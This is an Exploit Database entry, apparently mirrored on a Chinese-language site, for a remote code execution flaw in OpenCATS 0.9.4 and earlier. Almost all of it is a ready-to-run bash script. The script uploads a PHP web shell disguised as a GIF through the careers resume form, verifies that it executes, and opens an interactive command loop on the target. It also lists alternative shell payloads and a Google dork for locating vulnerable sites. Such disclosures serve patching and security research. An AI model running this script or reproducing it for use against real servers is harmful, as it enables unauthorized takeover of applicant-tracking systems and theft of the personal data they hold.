OpenCATS 0.9.4 – Remote Code Execution (RCE)

• Exploit Database
• 15 阅读

• 作者： Nicholas Ferreira
  日期： 2021-12-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50585/

• # Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)
  # Google Dork: intext:"Current Available Openings, Recently Posted Jobs"
  # Date: 21/09/2021
  # Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar
  # Vendor Homepage: https://www.opencats.org/
  # Software Link: https://github.com/opencats/OpenCATS
  # Version: <=0.9.4 Countach
  # Tested on: Debian, CentOS, Windows Server
  
  #!/bin/bash
  
  if [ $# -eq 0 ]
  then
  	echo "Usage: $0 <target URL>"
  	exit
  fi
  
  
  
  # if a payload doesn't work, try another
  
  payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
  #payload='GIF87a<?php echo exec($_REQUEST[0]); ?>'
  #payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>'
  #payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>'
  #payload='GIF87a<?php echo `$_REQUEST[0]`; ?>'
  #payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
  #payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>'
  
  target=$1
  
  green="\033[0;32m"
  red="\033[0;31m"
  reset="\033[0m"
  
  #====================== Functions
  
  rev() {
  while true
  	do echo -n -e "\n$ "
  	read cmd
  	curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d"
  	done
  }
  
  upload() {
  	curl -skL $1/$2 \
  	-H "Connection: close" \
  	-F resumeFile=@"$3;type=application/x-php" \
  	-F ID="$firstJb" \
  	-F candidateID="-1" \
  	-F applyToJobSubAction="resumeLoad" \
  	--compressed \
  	--insecure
  }
  
  getVersion() {
  	ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
  
  	if [ -z "${ver}" ]
  	then
  		ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
  		if [ -z "${ver}" ]
  		then
  			echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"
  			return 0
  		fi
  	fi
  	echo -e "${green}[*] Version detected: $ver${reset}"
  }
  
  writePayload(){
  
  	tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php"
  	file=`basename $tmpfile`
  	echo "$1" > $tmpfile
  }
  
  banner(){
  	echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d
  	echo -e "\n"
  }
  
  #======================
  
  banner
  
  echo "[*] Attacking target $target"
  
  echo "[*] Checking CATS version..."
  getVersion $target
  #exit
  
  echo "[*] Creating temp file with payload..."
  writePayload "$payload"
  
  #exit
  
  echo "[*] Checking active jobs..."
  
  jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'`
  numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'`
  firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="https://www.exploit-db.com/exploits/50585/index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`
  
  if [[ ! $numJb -gt 0 ]]
  then
  	echo -e "${red}[-] No active jobs found.${reset}"
  	echo "[*] Trying another path..."
  	jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'`
  	numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`
  
  	if [[ ! $numJb -gt 0 ]]
  	then
  		echo -e "${red}[-] Couldn't find any active job.${reset}"
  		exit
  	fi
  fi
  
  firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="https://www.exploit-db.com/exploits/50585/index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`
  
  echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}"
  echo "[*] Sending payload..."
  
  req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`
  
  if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
  then
  	echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"
  	echo "[*] Checking by another method..."
  
  	sed -i "s/GIF87a//" $tmpfile
  
  	req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`
  
  	if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
  	then
  		echo -e "${red}[-] Couldn't upload payload...${reset}"
  		exit
  	fi
  fi
  
  echo -e "${green}[+] Payload $file uploaded!"
  echo "[*] Deleting created temp file..."
  rm $tmpfile
  echo "[*] Checking shell..."
  check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file")
  if `echo $check | grep -q "0x7359"`
  then
  	echo -e "${green}[+] Got shell! :D${reset}"
  	curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d"
  	rev $target/upload/careerportaladd/$file
  else
  	echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}"
  fi